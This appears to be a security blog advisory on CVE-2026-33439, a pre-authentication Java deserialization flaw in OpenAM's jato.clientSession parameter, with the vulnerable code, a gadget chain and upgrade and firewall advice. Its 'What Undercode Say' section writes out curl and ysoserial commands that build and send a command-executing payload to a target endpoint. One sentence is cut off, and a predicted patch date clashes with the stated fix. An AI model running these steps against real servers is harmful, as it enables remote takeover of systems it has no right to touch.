Listen to this Post
CVE-2026-33439 is a critical vulnerability in OpenIdentityPlatform OpenAM, an open-source access management solution. The flaw resides in the JATO (Java Application Toolkit) framework, specifically within the deserialization of the `jato.clientSession` HTTP parameter. This parameter is processed without any class filtering, allowing an unauthenticated attacker to send a crafted serialized Java object to achieve Remote Code Execution (RCE) on the server.
The vulnerability arises from an incomplete patch for a previous issue, CVE-2021-35464. In that earlier fix, a `WhitelistObjectInputStream` was introduced to restrict deserialization of the `jato.pageSession` parameter to a set of safe classes. However, a second, overlooked deserialization entry point—jato.clientSession—was left unprotected. This parameter is handled by ClientSession.deserializeAttributes(), which directly calls `Encoder.deserialize()` → `ApplicationObjectInputStream.readObject()` without any class whitelist.
Exploitation is possible on any JATO ViewBean endpoint whose JSP contains `
The vulnerability affects OpenAM Community Edition versions up to and including 16.0.5 and is fixed in version 16.0.6 and later. The CVSS v3.1 score for this vulnerability is 9.8 (Critical), indicating its severe impact on confidentiality, integrity, and availability. Public Proof-of-Concept (PoC) and exploit code are already available, significantly increasing the risk of in-the-wild exploitation.
DailyCVE Form:
Platform: OpenAM
Version: <= 16.0.5
Vulnerability: Pre-auth RCE via Deserialization
Severity: Critical (CVSS 9.8)
date: 2026-04-07
Prediction: Patch expected by 2026-04-15
What Undercode Say
Check OpenAM version curl -s http://target:8080/openam/version | grep "Version" Test for vulnerability by sending a benign serialized object curl -X GET "http://target:8080/openam/ui/PWResetUserValidation?jato.clientSession=test" If the server returns an error or processes the parameter, it may be vulnerable Use ysoserial to generate a payload for CommonsCollections or other gadgets java -jar ysoserial.jar CommonsCollections6 "touch /tmp/pwned" | base64 | tr -d '\n' Send the payload (example with URL encoding) curl -X GET "http://target:8080/openam/ui/PWResetUserValidation?jato.clientSession=$(cat payload.b64 | jq -sRr @uri)"
Code Snippet (Vulnerable Code Path) :
// File: com/iplanet/jato/ClientSession.java
protected ClientSession(RequestContext context) {
this.encodedSessionString = context.getRequest().getParameter("jato.clientSession");
}
protected void deserializeAttributes() {
if (this.encodedSessionString != null && this.encodedSessionString.trim().length() > 0) {
this.setAttributes( (Map) Encoder.deserialize( Encoder.decodeHttp64(this.encodedSessionString), false) );
}
}
Source: OpenAM Security Advisory
Exploit
The exploit leverages a gadget chain using classes bundled in the OpenAM WAR file. A typical chain is:
1. `PriorityQueue.readObject()` (JDK) triggers heapify and comparison.
2. `Column$ColumnComparator.compare()` (openam-core-16.0.5.jar) calls `Column.getProperty()`.
3. `PropertyUtils.getObjectPropertyValue()` (openam-core-16.0.5.jar) invokes `Method.invoke()` on a `TemplatesImpl` object.
4. `TemplatesImpl.getOutputProperties()` (xalan-2.7.3.jar) calls `newTransformer()` → `defineTransletClasses()`.
5. `TransletClassLoader.defineClass()` loads the attacker’s bytecode.
6. `_class[bash].newInstance()` instantiates the malicious class, executing `Runtime.getRuntime().exec(cmd)`.
An unauthenticated attacker can send a crafted serialized object as the `jato.clientSession` GET/POST parameter to any vulnerable endpoint (e.g., /openam/ui/PWResetUserValidation).
Protection
- Upgrade: Immediately upgrade to OpenAM version 16.0.6 or later. This version contains the fix for the vulnerability.
2. Workaround (if upgrading is not immediately possible):
- Implement a Web Application Firewall (WAF) rule to block HTTP requests containing the `jato.clientSession` parameter.
- Restrict network access to the OpenAM administrative and user-facing interfaces to only trusted sources.
3. Code-Level Fix (for custom deployments):
- Apply the same `WhitelistObjectInputStream` logic used for `jato.pageSession` to the `jato.clientSession` deserialization path.
- Ensure that any deserialization of user-controlled data uses a strict class whitelist.
Impact
- Pre-Authentication Exploitation: An attacker can compromise the server without needing any credentials.
- Remote Code Execution (RCE): Successful exploitation allows the attacker to execute arbitrary commands on the server with the privileges of the application server user.
- Full System Compromise: Given the server’s privileges, this can lead to a complete takeover of the OpenAM server, including data theft, service disruption, and lateral movement within the network.
- Widespread Exposure: Public PoC and exploit code are available, making the vulnerability highly attractive for both targeted and mass exploitation.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
